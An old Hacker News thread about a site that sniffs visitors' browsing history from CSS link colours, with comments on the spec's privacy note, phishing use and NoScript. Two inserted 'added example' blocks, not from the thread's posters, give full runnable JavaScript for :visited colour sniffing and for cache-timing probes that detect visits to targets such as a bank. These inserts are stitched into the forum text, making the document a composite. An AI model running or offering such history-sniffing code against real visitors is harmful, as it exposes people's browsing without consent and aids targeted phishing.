
Hack: Site steals your browsing history based on URL link color - Alex3917
http://caughtyouwatching.com/catch.php
======
tptacek
This is really old news. Here's an HN link discussing someone's batshit crazy
startup idea based on it:

<http://news.ycombinator.com/item?id=404564>

~~~
int2e
It's definitely a useful trick for only showing certain content to certain
users. For example, I wrote a script so you only show Digg buttons to visitors
that have been to digg.com:
<http://int2e.com/blog/improved-digg-integration-script/>

~~~
beza1e1
You don't even need JavaScript.

    <a class="digg" href="http://digg.com/submit/">...digg button code...</a>

Now you can use CSS to hide visited links.

    a.digg:visited { display: none; }
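
An added example, not code posted by anyone in this thread: the `:visited` sniff that the CSS above and the linked scripts rely on, written so the decision logic runs either in a page (hidden anchors plus `getComputedStyle`) or offline against a fake browser. The probe URLs, class name and marker colours are assumptions made up for the demo; the fake browser's `lies` flag models the CSS 2.1 mitigation of rendering every link as unvisited.

```javascript
// Added example, not code from the thread: the classic CSS :visited history
// sniff, with the DOM access injected so the same logic can run against a
// fake browser (used below) or a real one (domProbe, when a DOM is present).

// The probe list and the marker colours are assumptions made up for this demo.
const PROBE_URLS = [
  "http://digg.com/",
  "http://news.ycombinator.com/",
  "http://example-bank.invalid/login",
];
const VISITED_COLOR = "rgb(255, 0, 0)";
const UNVISITED_COLOR = "rgb(0, 0, 255)";

// Injected stylesheet: an unvisited/visited colour pair on a throwaway class
// so the page's own styling cannot interfere with the read-back.
function sniffStyleSheet(className) {
  return `a.${className} { color: ${UNVISITED_COLOR}; }\n` +
         `a.${className}:visited { color: ${VISITED_COLOR}; }`;
}

// In a real browser: add a hidden <a href=url> and read back its computed
// colour. Only reached when a DOM exists.
function domProbe(className) {
  const style = document.createElement("style");
  style.textContent = sniffStyleSheet(className);
  document.head.appendChild(style);
  const container = document.createElement("div");
  container.style.cssText = "position:absolute;left:-9999px;visibility:hidden";
  document.body.appendChild(container);
  return (url) => {
    const a = document.createElement("a");
    a.className = className;
    a.href = url;
    container.appendChild(a);
    return getComputedStyle(a).color;
  };
}

// Core of the attack: any URL whose computed colour matches the :visited rule
// is reported as visited. `computedColor` is whichever probe was passed in.
function sniffHistory(urls, computedColor) {
  const visited = [];
  for (const url of urls) {
    if (computedColor(url) === VISITED_COLOR) visited.push(url);
  }
  return visited;
}

// Fake browser for offline runs: `history` is a constructed set of visited
// URLs; `lies` models the CSS 2.1 mitigation of treating every link as
// unvisited, after which the sniff learns nothing.
function fakeBrowser(history, lies = false) {
  return (url) => (!lies && history.has(url)) ? VISITED_COLOR : UNVISITED_COLOR;
}

function demo() {
  const leakyProbe = fakeBrowser(
    new Set(["http://digg.com/", "http://example-bank.invalid/login"]));
  const hardenedProbe = fakeBrowser(new Set(["http://digg.com/"]), true);
  return {
    leaky: sniffHistory(PROBE_URLS, leakyProbe),
    hardened: sniffHistory(PROBE_URLS, hardenedProbe),
  };
}

if (typeof document !== "undefined") {
  console.log(sniffHistory(PROBE_URLS, domProbe("h" + Date.now())));
} else {
  console.log(demo());
}
```

Current browsers implement that mitigation for `getComputedStyle` (it reports the unvisited colour for `:visited` links), so the DOM path reproduces the attack as it worked when this thread was written, not against a hardened UA; the offline run shows the leaky and hardened outcomes side by side.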

------
robin_reala
This is so old it’s even mentioned in the spec as something a browser can
choose to avoid:

<http://www.w3.org/TR/CSS21/selector.html#link-pseudo-classes>

_Note. It is possible for style sheet authors to abuse the :link and :visited
pseudo-classes to determine which sites a user has visited without the user's
consent.

UAs may therefore treat all links as unvisited links, or implement other
measures to preserve the user's privacy while rendering visited and unvisited
links differently. See [P3P] for more information about handling privacy._

------
rcoder
This is all very cute, but the real exploit isn't embarrassing your friends
and co-workers by revealing their kinks. Imagine a phishing site which could
sniff your browser history to see which bank you use, and then provide a
customized login form masquerading as that same site.

Exposing browsing history via CSS color information in the DOM is a serious
security hole that should be closed by browser vendors.

------
endergen
This is the best use of it: <http://startpanic.com/>

Demonstrates how powerful the technique is.

~~~
tlrobinson
It also crashed my browser...

------
ashleyw
<http://code.google.com/p/aza/source/browse/trunk/SocialHistory/SocialHistory.js>

It's one of those things which has questionable ethics…but honestly? A little
awesome...

------
antirez
Some time ago I wrote this:

<http://antirez.com/page/cachetest.html>

AFAIK the bug I showed is not currently fixed. The idea is to perform a request
for an image in the target site (usually the logo), meter how many
milliseconds it takes, if it takes very little (near to zero) you already
visited the site. If the latency is instead in the normal range you didn't.
See the article for more info.
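
An added example, not antirez's code: the cache-timing probe his comment describes, with one addition of my own, a per-visitor baseline taken from a cache-busted load of the same asset instead of a fixed "near zero" threshold. The target sites, asset paths and constructed timings are assumptions for the demo; the timing primitive is injected so the decision logic runs offline.

```javascript
// Added example, not antirez's code: time the load of an asset the target
// site always serves (its logo). A warm load that is far faster than a cold
// load of the same asset means it was already cached, i.e. the visitor has
// been there. Every network access goes through an injected timer so the
// classifier can be exercised offline.

// Targets are assumptions for the demo; any cacheable static asset works.
const CACHE_PROBES = [
  { site: "digg.com", img: "http://digg.com/img/logo.png" },
  { site: "example-bank.invalid", img: "http://example-bank.invalid/logo.png" },
];

// Cache-busting query so a second fetch of the same asset is guaranteed to
// come from the network. That cold time is the per-visitor baseline.
function coldUrl(url) {
  return url + (url.includes("?") ? "&" : "?") + "nocache=" + Math.random();
}

// Browser timer: milliseconds from setting src until onload/onerror fires.
function imageLoadMs(url) {
  return new Promise((resolve) => {
    const t0 = performance.now();
    const img = new Image();
    img.onload = img.onerror = () => resolve(performance.now() - t0);
    img.src = url;
  });
}

// Decision: a warm probe at or below `ratio` of the cold baseline for the
// same asset is a cache hit. Assets whose cold load is itself near zero
// (local network, proxy) cannot be separated and are reported as ambiguous.
function classifyCacheTimings(samples, ratio = 0.25, minColdMs = 10) {
  const result = { visited: [], notVisited: [], ambiguous: [] };
  for (const s of samples) {
    if (s.coldMs < minColdMs) result.ambiguous.push(s.site);
    else if (s.probeMs <= s.coldMs * ratio) result.visited.push(s.site);
    else result.notVisited.push(s.site);
  }
  return result;
}

// Gather samples. The *first* load of each asset is the real measurement
// (it is itself cached afterwards), then one cold load for the baseline.
async function probeSites(probes, loadMs) {
  const samples = [];
  for (const p of probes) {
    const probeMs = await loadMs(p.img);
    const coldMs = await loadMs(coldUrl(p.img));
    samples.push({ site: p.site, probeMs, coldMs });
  }
  return samples;
}

// Constructed timings standing in for a visitor who has been to digg.com
// (2 ms warm vs 180 ms cold), never to the bank (170 ms vs 190 ms), and a
// host that is fast either way and so cannot be classified.
const CONSTRUCTED_SAMPLES = [
  { site: "digg.com", probeMs: 2, coldMs: 180 },
  { site: "example-bank.invalid", probeMs: 170, coldMs: 190 },
  { site: "lan-host.invalid", probeMs: 1, coldMs: 3 },
];

if (typeof Image !== "undefined") {
  probeSites(CACHE_PROBES, imageLoadMs)
    .then((s) => console.log(classifyCacheTimings(s)));
} else {
  console.log(classifyCacheTimings(CONSTRUCTED_SAMPLES));
}
```

The probe is one-shot per asset per visitor: measuring it puts the asset in the cache, so a page cannot re-run it and must get its answer from the first load. The baseline fetch exists because an absolute threshold misclassifies anyone on a fast or proxied connection, which is what the ambiguous bucket catches.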

------
just_the_tip
Here's something similar based on social sites:
<http://www.azarask.in/blog/post/socialhistoryjs/>

------
lunchbox
I don't know if I've seen any privacy exploit that (1) compromises this much
personal data, and (2) is as easy to execute. Can anyone think of one?

------
DanielStraight
Yet another reason to use NoScript.

... why would I be down-voted for mentioning a solution which prevents 100% of
JavaScript history attacks???

~~~
axod
It's not really relevant to anything. I could say it's another reason to go
back to using BBS's instead of the WWW, but that's not really a useful
observation is it.

~~~
jrockway
But that's not what NoScript does; it allows you to whitelist known-good
scripts, and only run those. So when you go to goodsite.com, you can see the
cool JavaScript animations, but when you browse to steals-your-history.com,
your history won't be stolen.

Sure, goodsite.com can choose to spy on you... but that is less likely than
some other random site being the bad one.

~~~
mooncaine
"... but when you browse to steals-your-history.com, your history won't be
stolen."

Ah, but you won't know if your history's being stolen, right? The exploit can
be hidden from the user's eyes, hidden in an ad, for example, that the site
you trust shows you without realizing that ad is hacking your history.
Phishing sites, too, of course.

A big problem caused by this elegant hack is that it uses services web users
can't easily do without, services that most browser users don't know about
(and, ideally, shouldn't need to understand). I guess you're suggesting that a
user must be more wary of websites, avoiding unknown ones. Is that what you're
suggesting?

It'll be interesting to see what can be tried to remedy the privacy issues
caused by this.

------
stillrunning54
Scary stuff, good thing I always clear my history...

